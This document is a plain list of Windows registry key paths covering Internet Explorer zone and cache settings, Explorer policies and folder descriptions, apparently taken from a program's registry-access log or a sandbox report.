                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\MinLevel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\RecommendedLevel

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\MinLevel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\RecommendedLevel

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500

                
                HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BFE

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\hh.exe

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME\*

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2106

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2106

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\OperationalData

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionLow

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\CVListXMLVersionHigh

                
                HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SyncMode5

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\SessionStartTimeDefaultDeltaSecs

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CacheLimit

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CacheLimit

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CacheLimit

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionLow

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation\IECompatVersionHigh

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnIntranet

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnIntranet

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\WarnOnIntranet

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Restrictions

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Url History

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Url History

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Url History

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Url History

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Url History\DaysToKeep

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_IEDDE_REGISTER_URLECHO

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_IEDDE_REGISTER_URLECHO

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1201

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1201

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESPECT_OBJECTSAFETY_POLICY_KB905547

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_RESPECT_OBJECTSAFETY_POLICY_KB905547

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\ActiveX Compatibility\{16D51579-A30B-4C8B-A276-0FF4DC41E755}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{16D51579-A30B-4C8B-A276-0FF4DC41E755}

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISABLE_CROSS_DOMAIN_WINDOW_ACCESS_KB9761573

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_DISABLE_CROSS_DOMAIN_WINDOW_ACCESS_KB9761573

                
                HKEY_CURRENT_USER\Software\Classes\Directory\CurVer

                
                HKEY_LOCAL_MACHINE\Software\Classes\Directory\CurVer

                
                HKEY_CURRENT_USER\Software\Classes\Directory\

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c4-5f87-11ed-b63d-806e6f6e6963}\

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c4-5f87-11ed-b63d-806e6f6e6963}\Data

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c4-5f87-11ed-b63d-806e6f6e6963}\Generation

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c5-5f87-11ed-b63d-806e6f6e6963}\

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c5-5f87-11ed-b63d-806e6f6e6963}\Data

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume\{ad88c9c5-5f87-11ed-b63d-806e6f6e6963}\Generation

                
                HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FontCache\Parameters

                
                HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\FontCache\Parameters\ClientCacheSize

                
                HKEY_CURRENT_USER\Software\Microsoft\Direct3D

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Direct3D\DriverCompat

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Size

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Direct3D\DriverCompat\Name

                
                HKEY_CURRENT_USER\Software\Microsoft\DXGI

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\DXGI

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Avalon.Graphics

                
                HKEY_CURRENT_USER\EUDC\1252

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2000

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\2000

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Feed Discovery

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Feed Discovery

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Feed Discovery\Sound

                
                HKEY_CURRENT_USER\Software\Microsoft\Ftp

                
                HKEY_CURRENT_USER\Software\Microsoft\FTP\Use Web Based FTP

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Ftp

                
                HKEY_CURRENT_USER\Software\Microsoft\Avalon.Graphics

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PrefetchPrerender

                
                HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\PrefetchPrerender\Enabled

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLEAUT

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellCompatibility\Applications\Powershell.exe

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage2\ProgramsCache

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Category

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Name

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParentFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Description

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\RelativePath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\ParsingName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalizedName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Security

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResource

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\StreamResourceType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\LocalRedirectOnly

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Roamable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PreCreate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Stream

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PublishExpandedPath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\FolderTypeID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\InitFolderHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{625B53C3-AB48-4EC1-BA1F-A1EF4146FC19}\PropertyBag

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionInfo\1\KnownFolders

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Start Menu

                
                HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions

                
                HKEY_CLASSES_ROOT\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Drive\shellex\FolderExtensions\{fbeb8a05-beee-4442-804e-409d6c4515e9}\DriveMask

                
                HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Explorer

                
                HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DontShowSuperHidden

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellState

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoWebView

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ClassicShell

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\SeparateProcess

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoNetCrawling

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSimpleStartMenu

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowCompColor

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\DontPrettyPath

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowInfoTip

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideIcons

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\MapNetDrvBtn

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\WebView

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Filter

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SeparateProcess

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\NoNetCrawling

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\AutoCheckSelect

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\IconsOnly

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowTypeOverlay

                
                HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Shell\RegisteredApplications\UrlAssociations\Directory\OpenWithProgids

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\Shell\Associations\UrlAssociations\Directory

                
                HKEY_CLASSES_ROOT\Directory

                
                HKEY_CURRENT_USER\Software\Classes\Directory\ShellEx\IconHandler

                
                HKEY_CLASSES_ROOT\Folder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\ShellEx\IconHandler

                
                HKEY_CLASSES_ROOT\AllFilesystemObjects

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\ShellEx\IconHandler

                
                HKEY_CURRENT_USER\Software\Classes\Directory\DocObject

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\DocObject

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\DocObject

                
                HKEY_CURRENT_USER\Software\Classes\Directory\BrowseInPlace

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\BrowseInPlace

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\BrowseInPlace

                
                HKEY_CURRENT_USER\Software\Classes\Directory\Clsid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\Clsid

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\Clsid

                
                HKEY_CURRENT_USER\Software\Classes\Directory\IsShortcut

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\IsShortcut

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\IsShortcut

                
                HKEY_CURRENT_USER\Software\Classes\Directory\AlwaysShowExt

                
                HKEY_CURRENT_USER\Software\Classes\Directory\NeverShowExt

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Folder\NeverShowExt

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Classes\AllFilesystemObjects\NeverShowExt

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Category

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Name

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParentFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Description

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\RelativePath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\ParsingName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalizedName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Security

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResource

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\StreamResourceType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\LocalRedirectOnly

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Roamable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PreCreate

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Stream

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PublishExpandedPath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Attributes

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\FolderTypeID

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\InitFolderHandler

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\PropertyBag

                
                HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Desktop

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Category

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Name

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParentFolder

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Description

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\RelativePath

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\ParsingName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\InfoTip

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalizedName

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Icon

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Security

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResource

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\StreamResourceType

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\LocalRedirectOnly

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\Roamable

                
                HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{1B3EA5DC-B587-4786-B4EF-BD1DC332AEAE}\PreCreate

                
